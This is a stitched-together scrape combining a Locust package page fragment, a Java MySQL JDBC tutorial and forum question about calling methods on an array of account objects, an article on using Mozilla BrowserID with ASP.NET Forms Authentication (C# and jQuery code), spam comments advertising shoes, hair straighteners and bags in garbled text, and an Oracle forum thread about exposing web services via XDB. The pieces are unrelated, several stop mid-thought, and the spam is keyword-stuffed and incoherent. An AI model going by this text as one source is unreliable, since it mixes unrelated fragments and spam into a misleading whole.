Chat/discussion: Slack signup Authors - Carl Bystr (@cgbystrom on Twitter) - Jonatan Heyman (@jonatanheyman on Twitter) - Joakim Hamrén (@Jahaaja on Twitter) - Hugo Heyman (@hugoheyman on Twitter) - Lars Holmberg License Open source licensed under the MIT license (see LICENSE file for details). Project details Release history Release notifications | RSS feed Download files Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
https://pypi.org/project/locust/
CC-MAIN-2022-40
refinedweb
548
51.68
public class LoadDriver { public static void main(String[] args) { try { // The newInstance() call is a work around for some // broken Java implementations Class.forName("com.mysql.jdbc.Driver").newInstance(); } catch (Exception ex) println("getConnection returning " + aDriver.driver.getClass().getName()); return (con); }.. This jar is in your WEB-INF/lib folder, right? –JB Nizet Feb 24 '14 at 7:02 I did not include the mysql-connector file in WEB-INF/lib folder. more hot questions question feed default about us tour help blog chat data legal privacy policy work here advertising info developer jobs directory mobile contact us feedback Technology Life / Arts have a peek here It also prints the metadata (table name, column names) of a query result. package de.vogella.mysql.first; import java.sql.Connection; import java.sql.DriverManager; import java.sql.PreparedStatement; import Initialize the database class. // !_ note _! This also applies to Statement, PreparedStatement and ResultSet. So we need to know following informations for the mysql database: Driver class: The driver class for the mysql database is com.mysql.jdbc.Driver. If you're doing it "plain vanilla" in the command console, then you need to specify the path to the JAR file in the -cp or -classpath argument when executing your Java import java.sql.Connection; import java.sql.DriverManager; import java.sql.SQLException; // Notice, do not import com.mysql.jdbc.* // or you will have problems! Consult the API documentation that comes with your JDK for more specific information on how to use them. It can also be an IP address like 127.0.0.1. It is built on WordPress, hosted by Liquid Web, and the caches are served by CloudFlare CDN. import java.sql.*; class MysqlCon{ public static void main(String args[]){ try{ Class.forName("com.mysql.jdbc.Driver"); Connection con=DriverManager.getConnection( "jdbc:mysql://localhost:3306/sonoo","root","root"); //here sonoo is database name, root is username and password Statement stmt=con.createStatement(); ResultSet rs=stmt.executeQuery("select * from emp"); is just there to add the current directory to the classpath as well so that it can locate com.example.YourClass and the ; is the classpath separator as it is in Windows. Mysql Jdbc Driver Maven Note that closing the Connection is extremely important. Use color in verbatim environment How could rebels trust R2-D2? Duracell PowerCheck - How Does It Work? Contact No: 0120-4256464, 9990449935. I was looking for the database connectivity using Java with NetBeans and I have arrived at the right placeVote Up0Vote Down Reply3 years 24 days agoGuestSomnath JagtapThanks , this is very Create a new database called feedback and start using it with the following command. Mysql Jdbc Driver Class Now that I did, everything is working fine. Links and Literature Appendix A: Copyright and License MySQL and Java JDBC. to taste. Content reproduced on this site is the property of the respective copyright holders. MysqlDataSource implements javax.sql.DataSource which is the newer mechanism. –Sean Owen May 21 '10 at 9:00 @SeanOwen +1 for Good explanation. Java Mysql Connection Mysql Jdbc Url Class.forName("com.mysql.jdbc.Driver"); As part of its initialization, the DriverManager class will attempt to load the driver classes referenced in the "jdbc.drivers" system property. I was not aware of this method, because most of the people talk about DriverManager. –Sachin Kumar Sep 24 '15 at 20:16 1 Hi @SeanOwen I wonder that, why do navigate here World world world world How did Faramir know that Aragorn was the King in the Houses of Healing? Is it right? It is not like i don't know how to use Google. How To Connect Mysql Database In Java Using Eclipse Parent insists I lied and getting punished for it Star crossed lovers Is there a word for losing something in order to gain some other thing? If you go for a standalone app, it is a multi threaded environment and the best option would be to use a connection pool to reuse the physical connection instead of Check This Out How many four-engine commercial passenger jetliner types are currently in use? create database feedback; use feedback; Create a user with the following command. Jdbc Connection Java Code See Adding jars to the classpath for details. Follow him on Twitter, or befriend him on Facebook or Google Plus. How to create a table with all the combinations of 0 and 1 Can a dual citizen disregard border controls? Thanks JB Nizet for spotting the error! –Amit Nandan Periyapatna Feb 24 '14 at 7:08 The jars in WEB-INF/lib are the classpath of your webapp. If it's installed at the same machine where you run the Java code, then you can just use localhost. No Suitable Driver Found For Jdbc:mysql What is a person called who writes for a blind person in an examination hall? thanks.Vote Up0Vote Down Reply3 years 7 months agoGuestCode NirvanaHello! Go to jre/lib/ext folder and paste the jar file here. 2) set classpath: There are two ways to set the classpath: temporary permanent How to set the temporary classpath open command Normally, a JDBC 4.0 driver should be autoloaded when you just drop it in runtime classpath. this contact form How is the "WannaCry" Malware spreading and how should users defend themselves from it? more stack exchange communities company blog Tour Start here for a quick overview of the site Help Center Detailed answers to any questions you might have Meta Discuss the workings and Is it? Create a database in MySQL. If you don't close connections and keep getting a lot of them in a short time, then the database may run out of connections and your application may break. Thanks.Vote Up0Vote Down Reply2 years 9 months agoGuesttechnofranchiseYour articles are always best and easier to understand.
http://themotechnetwork.com/mysql-jdbc/com-mysql-jdbc-driver-drivermanager.html
CC-MAIN-2017-30
refinedweb
971
57.47
Phone Number, Email, Emoji Extraction in SpaCy for NLP Text Extraction You can check the first part of the blog here. You can even watch the video of the first part get an idea for what’s in your data. Your pattern could look like this: [{"LOWER": "facebook"}, {"LEMMA": "be"}, {"POS": "ADV", "OP": "*"}, {"POS": "ADJ"}] This translates to a token whose lowercase form matches “facebook” (like Facebook, facebook or FACEBOOK), followed by a token with the lemma “be” (for example, is, was, or ‘s), followed by an optional adverb, followed by an adjective. This is the link for all the annotations- Here we are importing the necessary libraries. import spacy from spacy.matcher import Matcher from spacy.tokens import Span from spacy import displacy spacy.load() loads a model. nlp = spacy.load('en_core_web_sm') matcher.add() adds a rule to the matcher, consisting of an ID key, one or more patterns, and a callback function to act on the matches. In our case the ID key is fb. The call back function is callback_method_fb(). The callback function will receive the arguments matcher, doc, i and matches. The matcher returns a list of (match_id, start, end) tuples. The match_id is the hash value of the string ID “fb”. We have used the same pattern explained above. matcher = Matcher(nlp.vocab) matched_sents = [] pattern = [{"LOWER": "facebook"}, {"LEMMA": "be"}, {"POS": "ADV", "OP": "*"}, {"POS": "ADJ"}] def callback_method_fb(matcher, doc, i, matches): matched_id, start, end = matches[i] span = doc[start:end] sent = span.sent match_ents = [{ 'start':span.start_char - sent.start_char, 'end': span.end_char - sent.start_char, 'label': 'MATCH' }] matched_sents.append({'text': sent.text, 'ents':match_ents}) matcher.add("fb", callback_method_fb, pattern) doc = nlp("I'd say that Facebook is evil. – Facebook is pretty cool, right?") matches = matcher(doc) matches [(8017838677478259815, 4, 7), (8017838677478259815, 9, 13)] We can see the matched sentences and their start and end positions. matched_sents [{'text': "I'd say that Facebook is evil.", 'ents': [{'start': 13, 'end': 29, 'label': 'MATCH'}]}, {'text': '– Facebook is pretty cool, right?', 'ents': [{'start': 2, 'end': 25, 'label': 'MATCH'}]}] displacy visualizes dependencies and entities in your browser or in a notebook. displaCy is able to detect whether you’re working in a Jupyter notebook, and will return markup that can be rendered in a cell straight away. displacy.render(matched_sents, style='ent', manual = True) I’d say that Facebook is evil MATCH .– Facebook is pretty cool MATCH , right? Phone numbers Phone numbers can have many different formats and matching them is often tricky. During tokenization, spaCy will leave sequences of numbers intact and only split on whitespace and punctuation. This means that your match pattern will have to look out for number sequences of a certain length, surrounded by specific punctuation – depending on the national conventions. You want to match like this (123) 4567 8901 or (123) 4567-8901 [{"ORTH": "("}, {"SHAPE": "ddd"}, {"ORTH": ")"}, {"SHAPE": "dddd"}, {"ORTH": "-", "OP": "?"}, {"SHAPE": "dddd"}] In this pattern we are looking for a opening bracket. Then we are matching a number with 3 digits. Then a closing bracket. Then a number with 4 digits. Then a dash which is optional. Lastly, a number with 4 digits. pattern = [{"ORTH": "("}, {"SHAPE": "ddd"}, {"ORTH": ")"}, {"SHAPE": "dddd"}, {"ORTH": "-", "OP": "?"}, {"SHAPE": "dddd"}] matcher = Matcher(nlp.vocab) matcher.add("PhoneNumber", None, pattern) doc = nlp("Call me at (123) 4560-7890") print([t.text for t in doc]) ['Call', 'me', 'at', '(', '123', ')', '4560', '-', '7890'] A match is found between 3rd to 9th position. matches = matcher(doc) matches [(7978097794922043545, 3, 9)] We can get the matched number. for match_id, start, end in matches: span = doc[start:end] print(span.text) (123) 4560-7890 In this the pattern checks for one or more character from a-zA-Z0-9-_.. Then a @. Then again one or more character from a-zA-Z0-9-_. pattern = [{"TEXT": {"REGEX": "[a-zA-Z0-9-_.][email protected][a-zA-Z0-9-_.]+"}}] matcher = Matcher(nlp.vocab) matcher.add("Email", None, pattern) text = "Email me at [email protected] and [email protected]" doc = nlp(text) matches = matcher(doc) matches [(11010771136823990775, 3, 4), (11010771136823990775, 5, 6)] for match_id, start, end in matches: span = doc[start:end] print(span.text) Hashtags and emoji on social media Social media posts, especially tweets, can be difficult to work with. They’re very short and often contain various emoji and hashtags. By only looking at the plain text, you’ll lose a lot of valuable semantic information. Let’s say you’ve extracted a large sample of social media posts on a specific topic, for example posts mentioning a brand name or product. As the first step of your data exploration, you want to filter out posts containing certain emoji and use them to assign a general sentiment score, based on whether the expressed emotion is positive or negative, e.g. 😀 or 😞. You also want to find, merge and label hashtags like #MondayMotivation, to be able to ignore or analyze them later. By default, spaCy’s tokenizer will split emoji into separate tokens. This means that you can create a pattern for one or more emoji tokens. Valid hashtags usually consist of a #, plus a sequence of ASCII characters with no whitespace, making them easy to match as well. We have made a list of positive and negative emojis. pos_emoji = ["😀", "😃", "😂", "🤣", "😊", "😍"] # Positive emoji neg_emoji = ["😞", "😠", "😩", "😢", "😭", "😒"] # Negative emoji pos_emoji ['😀', '😃', '😂', '🤣', '😊', '😍'] Now we will create a pattern for positive and negative emojis. # Add patterns to match one or more emoji tokens pos_patterns = [[{"ORTH": emoji}] for emoji in pos_emoji] neg_patterns = [[{"ORTH": emoji}] for emoji in neg_emoji] pos_patterns [[{'ORTH': '😀'}], [{'ORTH': '😃'}], [{'ORTH': '😂'}], [{'ORTH': '🤣'}], [{'ORTH': '😊'}], [{'ORTH': '😍'}]] neg_patterns [[{'ORTH': '😞'}], [{'ORTH': '😠'}], [{'ORTH': '😩'}], [{'ORTH': '😢'}], [{'ORTH': '😭'}], [{'ORTH': '😒'}]] We will write a function label_sentiment() which will be called after every match to label the sentiment of the emoji. If the sentiment is positive then we are adding 0.1 to doc.sentiment and if the sentiment is negative then we are subtracting 0.1 from doc.sentiment. def label_sentiment(matcher, doc, i, matches): match_id, start, end = matches[i] if doc.vocab.strings[match_id] == 'HAPPY': doc.sentiment += 0.1 elif doc.vocab.strings[match_id] == 'SAD': doc.sentiment -= 0.1 Here with the HAPPY and SAD matchers we are also adding HASHTAG matcher to extract the hashtags. For hashtags we are going to match text which has atleast one ‘#’. matcher = Matcher(nlp.vocab) matcher.add("HAPPY", label_sentiment, *pos_patterns) matcher.add('SAD', label_sentiment, *neg_patterns) matcher.add('HASHTAG', None, [{'TEXT': '#'}, {'IS_ASCII': True}]) doc = nlp("Hello world 😀 #KGPTalkie") matches = matcher(doc) for match_id, start, end in matches: string_id = doc.vocab.strings[match_id] # Look up string ID span = doc[start:end] print(string_id, span.text) HAPPY 😀 HASHTAG #KGPTalkie Efficient phrase matching If you need to match large terminology lists, you can also use the PhraseMatcher and create Doc objects instead of token patterns, which is much more efficient overall. The Doc patterns can contain single or multiple tokens. We are going to extract the names in terms from a document. We have made a pattern for the same. from spacy.matcher import PhraseMatcher matcher = PhraseMatcher(nlp.vocab) terms = ['BARAC OBAMA', 'ANGELA MERKEL', 'WASHINGTON D.C.'] pattern = [nlp.make_doc(text) for text in terms] pattern [BARAC OBAMA, ANGELA MERKEL, WASHINGTON D.C.] This is our document. matcher.add('term', None, *pattern) doc = nlp("German Chancellor ANGELA MERKEL and US President BARAC OBAMA " "converse in the Oval Office inside the White House in WASHINGTON D.C.") doc German Chancellor ANGELA MERKEL and US President BARAC OBAMA converse in the Oval Office inside the White House in WASHINGTON D.C. We have found the matches. matches = matcher(doc) for match_id, start, end in matches: span = doc[start:end] print(span.text) ANGELA MERKEL BARAC OBAMA WASHINGTON D.C. matches [(4519742297340331040, 2, 4), (4519742297340331040, 7, 9), (4519742297340331040, 19, 21)] Custom Rule Based Entity Recognition The EntityRuler is an exciting new component that lets you add named entities based on pattern dictionaries, and makes it easy to combine rule-based and statistical named entity recognition for even more powerful models. Entity Patterns Entity patterns are dictionaries with two keys: “label”, specifying the label to assign to the entity if the pattern is matched, and “pattern”, the match pattern. The entity ruler accepts two types of patterns: - Phrase Pattern {"label": "ORG", "pattern": "Apple"} - Token Pattern {. We are importing EntityRuler from spacy.pipeline. Then we are loading a fresh model using spacy.load(). We have created a pattern which will label KGP Talkie as ORG and san francisco as GPE. from spacy.pipeline import EntityRuler nlp = spacy.load('en_core_web_sm') ruler = EntityRuler(nlp) patterns = [{"label": "ORG", "pattern": "KGP Talkie"}, {"label": "GPE", "pattern": [{"LOWER": "san"}, {"LOWER": "francisco"}]}] patterns [{'label': 'ORG', 'pattern': 'KGP Talkie'}, {'label': 'GPE', 'pattern': [{'LOWER': 'san'}, {'LOWER': 'francisco'}]}] ruler.add_patterns(patterns) nlp.add_pipe(ruler) doc = nlp("KGP Talkie is opening its first big office in San Francisco.") doc KGP Talkie is opening its first big office in San Francisco. We can see that KGP Talkie and San Francisco are considered as entites. for ent in doc.ents: print(ent.text, ent.label_) KGP Talkie PERSON first ORDINAL San Francisco GPE Compared to using only.
https://kgptalkie.com/phone-number-email-emoji-extraction-in-spacy-for-nlp/
CC-MAIN-2021-17
refinedweb
1,500
57.87
I. Love that you'll allow custom bracketing definition... that's killer. Count me in for testing! @SeanWcom Thanks! Preview of BracketHighligheter's new wrapping feature. I have always wanted a nice easy way to wrap selections with custom stuff. I just wanted for instance to select some text, and select a something to wrap it with: tags, brackets, compiler switches, other stuff. ST2 does good with brackets, but so much with other stuff. So one of the things I wanted to do in BH2 was to add this kind of functionality. I wanted to be able to define starting selections, tabstops, and indent style if required. As you can see, the first example wraps a function with a compiler switch in C. It has two tabstops, and it is blocked off when the wrapping occurs.In the second example, we have some HTML code, that gets wrapped in a generic tag with two tabstops that both automatically get selected so you can change their name a the same time. Also it blocks off the content and indents it. This can be applied to lots of stuff. Something I am starting find pretty useful. Still have some stuff to work out on bracket swapping which might end up being a more simplified version of this. Swapping won't auto indent etc, it will just replace the brackets inline. So you could turn curly brackets to square, or turn an #if/#endif condition into a #if/#elseif/#endif leaving the conditions in tact. I might add tabstops and auto selections to swapping as well. I think once I update the swapping stuff, I will setup the branch. I didn't intend wrapping and swapping to turn into what it did...it just kind of did...so this will set me back a little. Wrapping is done, I just need to rewrite the swapping stuff. That is totally awesome facelessuser! I suppose you are going to allow us to customize these automatic bracketing correct? Of course. The last thing I want to do is have people making requests to me for doing this in every language . So everything is generalized. Here is an example configuration (keep in mind, syntax is subject to change before the official release): { "} ] }, Due to swapping behavior being different than wrapping, they will have separate definitions. I am not sure if they will exist in the same settings file or have a separate swap settings file. I really am looking at swapping and wrapping as separate sub-plugins. I toyed with finding a way to make the same definition work for both, but it just got ugly. Wrapping can surround text with anything. Swapping is specifically swapping out the brackets that BH highlights. Usage currently is select text, invoke wrapping shortcut, and use fuzzy panel to pick what you want to wrap with. So it won't be automatic, but still pretty quick compared to how it was before. OK, well be sure that I'm gonna check them out, even though I don't know Python, I guess I'm gonna have to learn. Anyway, looking forward to it. Edit for new post: That is even more awesome! Can't wait for this
https://forum.sublimetext.com/t/brackethighlighter-2-moar-bracket-powa/7473/18
CC-MAIN-2016-40
refinedweb
536
74.9
The problem I run into is that I can't figure out how to call a method. The book I am learning out of gives a really poor example of how this is done, and I can't seem to get it to work for me. Here is my Test Class. import java.util.Scanner; public class Test { public static void main(String[] args) { Scanner input = new Scanner( System.in ); Account ACT = new Account(); Account ACTS[] = new Account[32]; int inInt; double inDouble; int spool = 0; System.out.printf("Enter one of the following\n"); System.out.printf("1) Create a new Checking Account\n"); System.out.printf("2) Create a new Savings Account\n"); System.out.printf("3) Make a Deposit\n"); System.out.printf("4) Make a Withdraw\n"); System.out.printf("5) Display all accounts\n"); System.out.printf("6) Calculate Daily interest\n"); System.out.printf("7) Exit\n"); System.out.printf("\n"); int in = input.nextInt(); switch (in) { case 1: System.out.printf("A new Checking account with account number: "); inInt = input.nextInt(); System.out.printf(" Enter the initial balance: "); inDouble = input.nextFloat(); ACTS[spool] = new Checking(inInt, inDouble); spool++; break; case 2: System.out.printf("A new Savings account with account number: "); inInt = input.nextInt(); System.out.printf(" Enter the initial balance: "); inDouble = input.nextFloat(); ACTS[spool] = new Savings(inInt, inDouble); spool++; break; case 3: System.out.printf("Which account to deposit?: \n"); inInt = input.nextInt(); System.out.printf(" Enter the amount of deposit: "); inDouble = input.nextFloat(); ACT.deposit(inInt, inDouble); break; case 4: System.out.printf("Which account to withdraw?: \n"); inInt = input.nextInt(); System.out.printf(" Enter the amount of withdraw: "); inDouble = input.nextFloat(); ACT.withdraw(inInt, inDouble); break; case 5: System.out.printf("*********************************"); for(int run = 0; run <= spool-1; run++) { inInt = ACTS[run].getClass().getAcctNum(); //ERROR how do I call the getAcctNum() method from class Savings or Checking? inDouble = ACTS[run].// call getAcctBalance()??? System.out.printf("Account " + inInt + " has balance " + inDouble + "\n"); } break; case 6: break; case 7: break; default: break; } } } note: in case5 is where I run into the problem, how do I call the getAcctNum method from class Savings or Checking? thanks for reading my post. This post has been edited by dnamrax: 06 November 2009 - 06:20 PM
http://www.dreamincode.net/forums/topic/137194-polymorphic-classes/
CC-MAIN-2017-43
refinedweb
381
54.39
Using BrowserID Authentication in ASP.NET Web Sites Introduction Using a single user ID and password across multiple web sites is not a new idea. Software companies have played with this idea with varying success. Unfortunately developers often find it complicated to implement support for these systems in their ASP.NET web sites. That is where Browser ID initiative from Mozilla Labs shines. Browser ID offers a simple way of authenticating users of your web site using their single sign-on credentials. Under Browser ID scheme, users can use any verified email address as their user ID. The actual login credentials are not stored in your database but in the Browser ID system. Thus users are free to use a single user ID and password across all the web sites that support Browser ID. In this article you will learn to use ASP.NET Forms Authentication and Browser ID hand in hand. What is Browser ID? Browser ID is an effort by Mozilla Labs to provide a simple solution for single sign-on. The official web site for Browser ID is and you can use it to create your own Browser ID. As per Browser ID documentation: Thus you will create a Browser ID using your existing email address. The email address needs to be confirmed by clicking on a link in a verification email sent by the Browser ID system. You will also specify a password for your Browser ID during the registration. This combination of email address and password will be used to sign in to any web site that supports Browser ID. The following figure shows the Browser ID creation page of the Browser ID web site. Browser ID Creation Page Though we won't go into more details of the internals of BrowserID, you can read more about it here. For the rest of the article, we will assume that you have created a Browser ID using the step just mentioned. Configuring an ASP.NET Web Site To support Browser ID scheme in your ASP.NET web site you first need to configure it to use Forms Authentication. So, create a new empty ASP.NET application and open its web.config file. Add the following markup to the web.config file: <authentication mode="Forms"> <forms loginUrl="~/LoginViaBrowserID.aspx" defaultUrl="~/Default.aspx" /> </authentication> <authorization> <deny users="?"/> </authorization> Here, you first configured the web site to use Forms authentication using <authentication> section and mode attribute. The loginUrl is set to LoginViaBrowserID.aspx and defaultUrl is set to Default.aspx. You will develop both of these web forms in the next sections. The <authorization> section denies access to anonymous users. Developing a Login Web Form Now, add a new web form to the web site and name it LoginViaBrowserID.aspx. The LoginViaBrowserID.aspx simply contains a few lines of markup as shown below: <form action="LoginViaBrowserID.aspx" runat="server" method="post" id="loginForm"> <div align="center"> <input type="hidden" name="assertion" value="" id="assertion" /> <input id="signin" type="button" value="Sign In" /> <asp:Label </div> </form> Notice the lines marked in bold letters. The hidden field named assertion is intended to store an 'assertion' issued by the Browser ID system after signing in. An assertion is a string containing a signed claim that the user owns a particular email address. This string is issued by the Browser ID system and you use a hidden field to pass it to the server side code. The "Sign In" button is a plain HTML button. You can also use an image button with some standard images as shown here. Next, go to the <head> section of the LoginViaBrowserID web form and add the script references as shown below: <script type="text/javascript" src="scripts/jquery-1.7.2.min.js"></script> <script src="" type="text/javascript"></script> The first script reference is for jQuery library. You will later use jQuery for client side scripting. The second script reference refers to the BrowserID library. The BrowserID library exposes certain in built functions that allow you to work with the system. Now, add the following jQuery code in a <script> block. function onAssertion(assertion) { if (assertion) { document.getElementById('assertion').value = assertion; document.getElementById('loginForm').submit(); } else { alert('Error while performing Browser ID authentication!'); } } $(document).ready(function () { $("#signin").click(function () { navigator.id.get(onAssertion); return false; }); }); The ready() event handler wires the click event of the "Sign In" button to a function. The event handler function calls the navigator.id.get() function from the BrowserID library referred earlier. It also passes a callback function onAssertion to the get() function. The get() function will prompt the user to sign in with an email address. It will then generate a signed assertion containing the supplied email address. The assertion string is passed to the callback function. If generation of assertion fails due to any reason then the callback function will be called with a null value. The callback function then sends the assertion string to the server for verification. The callback function onAssertion sets the hidden field with the assertion string value and then submits the form using the JavaScript submit() method. This way the web form is posted to the server and server side code can then access the assertion string. Once the form is posted to the server, you should verify the assertion. The verification process needs two things - audience and assertion. The audience is the hostname and optional port number of your site. The assertion is the assertion string you receive in the hidden field. The following code shows how the verification is done: protected void Page_Load(object sender, EventArgs e) { if (Request.Form["assertion"] != null) { string assertion = Request.Form["assertion"]; string audience = Request.Url.Host + ":" + Request.Url.Port.ToString(); BrowserID browserid = new BrowserID(audience, assertion); if (browserid.Validate()) { FormsAuthentication.SetAuthCookie(browserid.Email, true, "/"); FormsAuthentication.RedirectFromLoginPage(browserid.Email, true, "/"); } else { lblMessage.Text = "Invalid Browser ID!"; } } } The code retrieves the assertion string using Request.Form collection. It also forms an audience string by concatenating host and port number. It then creates an instance of the BrowserID class and passes audience and assertion as the constructor parameters. The BrowserID class is a custom class that you need to create. It talks with the BrowserID system for the purpose of verifying the assertion. The BrowserID class will be discussed in the next section. Once the assertion is verified by calling the Validate() method of the BrowserID class you can issue a Forms Authentication cookie. You do that using the SetAuthCookie() method of the FormsAuthentication class. The user is then taken to the default page. The BrowserID Class The BrowserID class does the job of verifying the assertion string with the Browser ID system. After successful verification the Browser ID system returns user details such as email address, status, validity and issuer in the form of a JSON string. To convert this JSON string into a .NET object, you will use Json.NET. Json.NET is a high-performance JSON framework for .NET applications. So, make sure to refer the Json.NET assembly in your web site. Then add a class named BrowserID to your web site and key-in the following code: public class BrowserID { public string Audience { get; set; } public string Assertion { get; set; } public string Email { get; set; } public string Validity { get; set; } public string Issuer { get; set; } public BrowserID(string audience, string assertion) { this.Audience = audience; this.Assertion = assertion; } public bool Validate() { string url = ""; NameValueCollection parameters = new NameValueCollection(); parameters.Add("assertion", this.Assertion); parameters.Add("audience", this.Audience); WebClient client = new WebClient(); byte[] data = client.UploadValues(url, parameters); string jsonDataString = Encoding.UTF8.GetString(data); JsonUser jsonDataObject = JsonConvert.DeserializeObject<JsonUser>(jsonDataString); if (jsonDataObject.status == "okay") { this.Email = jsonDataObject.email; this.Validity = jsonDataObject.validity; this.Issuer = jsonDataObject.issuer; return true; } else { return false; } } } The BrowserID class consists of five public properties, viz. Audience, Assertion, Email, Validity and Issuer. The constructor of the BrowserID class accepts audience and assertion as the parameters. The main method of the BrowserID class is Validate(). It sends a request to BrowserID system () along with audience and assertion values. Notice the use of the WebClient class to send a request to the Browser ID system. The data returned from the request is a JSON string. You need to convert this string into a .NET object use it further. This is done using the JsonConvert class of Json.NET library. The DeserializeObject() method takes a JSON string and returns a .NET object as indicated by the generic type. The JsonUser class looks like this: public class JsonUser { public string email { get; set; } public string status { get; set; } public string validity { get; set; } public string issuer { get; set; } } Once the request is successful, you simply assign the respective properties of BrowserID class for later use. Ok. Now you are ready to test the sign in functionality. Run LoginViaBrowserID web form and click on the "Sign In" button. This will open a window and will allow you enter your Browser ID credentials. Upon successful signing in you will be taken to the Default.aspx web form. Finishing Signing In Developing Default Web Form Default.aspx is a simple web form that displays a welcome message to the currently signed in user. It also shows a "Sign Out" button so that the user can log out of the system. The markup of the default web form is shown below: <form id="defaultForm" runat="server"> <div> <asp:Label</asp:Label> <br /><br /> <input type="hidden" name="signout" value="" id="signout" /> <input id="logout" type="button" value="Sign Out" /> </div> </form> As you can see, the web form consists of a Label, a hidden field and a button. The click event of the "Sign Out" button is handled via jQuery as shown below: function onSignOut() { document.getElementById('signout').value = 'true'; document.getElementById('defaultForm').submit(); } $(document).ready(function () { $("#logout").click(function () { navigator.id.logout(onSignOut); return false; }); }); The click event handler of the "Sign Out" button invokes navigator.id.logout() function. As of now, this function is not fully implemented and simply calls the callback function supplied as the parameter upon completion. The callback function, onSignOut(), sets the hidden field value to "true" and then submits the form. The server side code of Default.aspx is shown below: protected void Page_Load(object sender, EventArgs e) { if (Request.Form["signout"] == "true") { FormsAuthentication.SignOut(); Response.Redirect(FormsAuthentication.LoginUrl); } else { Label1.Text = "Welcome " + Page.User.Identity.Name + " !"; } } The code checks the signout hidden field value and if true calls SignOut() method of FormsAuthentication class. Otherwise, a welcome message is displayed to the user. Notice the use of User.Identity.Name property that reflects the email address of the user. The following figure shows a sample run of default.aspx. Sign Out Summary Browser ID allows you to use a single user ID and password to access all the web sites supporting Browser ID. The user ID takes the form of a verified email address. The user login credentials are not stored in your database but in the Browser ID system. At run time you validate a user against his Browser ID credentials. You can then integrate ASP.NET Forms Authentication with the Browser ID. You can also extend the integration further and develop a role based system based for Browser ID users. Download the code for this article. GHD glattejern er helt unike og det er ogsÃ¥ derfor de sælger sÃ¥ godtPosted by motherdhmm on 05/30/2013 10:42am [url=]dr dre beats[/url] Glattejernene fra ghd har bevist sig at være af den absolut bedste kvalitet, bÃ¥de til at glatte hÃ¥r og lave store bløde krøller. Med de keramiske plader, som benytter samme teknik man finder i rumfartsteknologi, fÃ¥r dit hÃ¥r den absolut bedste behandling nÃ¥r du skal opnÃ¥ det perfekte glatte hÃ¥r. [url=]beats by dre australia[=]dr dre beats[/url] ghd glattejern mere stilfuldt design, brugen af feltet i dag mere populære sorte apparater, en pige forelsket i en af ??flere farver, hÃ¥ndtaget er skinnende sort, farven varieret, hÃ¥nd-designet, non-slip let at forstÃ¥, svært til at glide, greb bedre, skifte design i den forreste del af hÃ¥ndtaget, nem at betjene.Reply Lightweight perceptive â Nike Let off TR Befit in shoot up 2013 3 seriesPosted by Tufffruntee on 04/24/2013 01:16pm Nike Manumitted TR Fit 3 prominent features is to exploit the additional scheme: Nike Let off 5 soles improved bending Scratch; modern tractor layout making training more focused when; lighter weight, the permeability is stronger, and more fashionable shoe designs not not exhort shoes [url=]nike huarache[/url] more smug wearing, barefoot training feel, but also more in vogue appearance. Nike On the house TR Robust 3 provides unequalled lateral perseverance, you can deceive the legs in the lap boost during training. Eager vamp upper breathable webbing, demean soap up's unique design can be [url=]nike free run[/url] seen through it. Lightweight, rugged, thin soap up facts habituated to at hand entirely few seams, more obedient, forward is stronger. Requirement more support, role of a training vex, froth come in more parts of the neediness in return conformableness, foam loose. Put to use twice say nothing moisture wicking counterfeit materials, unshiny on your feet, mitigate keep feet dry and comfortable. Phylite [url=]nike free run[/url] midsole offers lightweight revolt unchanging, special durability and even outsole can do to greatly turn the total dialect heft of the shoe. Qianzhang pods on the outsole and heel-shaped Green rubber enhances the shoe multi-directional traction on sundry surfaces.Reply Lightweight smart â Nike Unshackled TR Right in spring 2013 3 seriesPosted by Tufffruntee on 04/21/2013 02:57pm Nike Free TR Stalwart 3 prominent features is to purchase the new scheme: Nike Self-ruling 5 soles improved bending Groove; stylish tractor imitate making training more focused when; lighter ballast, the permeability is stronger, and more fashionable shoe designs not not aim for shoes [url=]air max 90[/url] more serene wearing, barefoot training sensible of, but also more stylish appearance. Nike Free TR Robust 3 provides excellent lateral reliability, you can deceive the legs in the untenable during training. Diligent vamp majuscule letters breathable grating, lower sparkle's solitary design can be [url=]air max 90 uk[/url] seen from stem to stern it. Lightweight, ragged, reduce froth matter familiar through completely occasional seams, more flexible, support is stronger. Requirement more help, role of a training exercise, foam make inaccessible in more parts of the destitution after flexibility, foam loose. Put to use double talk moisture wicking counterfeit materials, unshiny on your feet, help living feet tiring and comfortable. Phylite [url=]nike free run uk[/url] midsole offers lightweight revolt sustained, famous durability and even outsole can do to greatly reduce the all-embracing avoirdupois of the shoe. Qianzhang pods on the outsole and heel-shaped Grassland rubber enhances the shoe multi-directional drag on odd surfaces.Reply coo regarding bag is designed for different commercial materials including glasses, fabrics, heavy materials.Posted by pletcherkha on 02/26/2013 07:06pm How don't you do it? Color signal your crap [url=]carolina herrera baratos[/url]! In classifying the actual waste, [url=]sac burberry solde[/url] usually are disposing then to the proper place- the proper place where they must be. The good fastest way to help to make things easier could be to have plastic material bags having different hues [url=]burberry wallet[/url] 2013. When trash is only placed inside of a plastic carrier, regardless with their classification, unpleasant smell might emanate from the plastic nonsense container [url=]longchamp le pliage[/url] 2013.Reply
http://www.codeguru.com/csharp/.net/net_asp/using-browserid-authentication-in-asp.net-web-sites.htm
CC-MAIN-2015-27
refinedweb
2,620
57.06
Question on webservices in Oracle816802 Aug 22, 2013 2:14 AM Hi All, I am new to Oracle webservices and I am doing POC on this one. The requirement is as given below. W have a Middleware team who is expecting data from our oracle tables. What the analysts are saying is: They will develop a WSDL and provide us the webservice information. As per them the WSDL contains what columns they need data for and in what format. So I need to use that WSDL and get the data and send the data to the Middleware team using their WEBSERVICE. Correct me If I am wrong about anything given above. I am going through the Oracle documentation and I can see we are using UTL_HTTP packages to make a request and read the data from the URL. I did not see anywhere where I can generate data as per their requirement and provide my data as a webservice. Much appreciate your guidance here on how to create data as a webservice from oracle.. Thanks, MK. 1. Re: Question on webservices in OracleBilly~Verreynne Aug 22, 2013 5:02 AM (in response to 816802) Please do not ask the same question multiple times in different formats. As I've already responded to your other question, you need to use XDB. XDB support WebDAV, HTTP, HTTPS and FTP clients - as oppose to the standard database OCI or JDBC client. One of the features of XDB, is web service support - providing a web service framework for calling standard PL/SQL code in the database.) Hi Billy, I read the oracle documentation where we are setting the Web services and how we can call the web services or create a function and this function can be provided as a web service. Using Native Oracle XML&nbsp;DB Web Services I am trying to simulate the same and so I create a TEST account and granted the specific roles given by the document. I want to build a test case like as given below. Procedure PROC1 calls PROC2 and PROC2 has out parameters and send back the response to PROC1 which will see this data and send us a confirmation back. I want to simulate the same using webservices where I want to call my proc which will be called by a webservice and this webservice will send me a response back regarding the status. 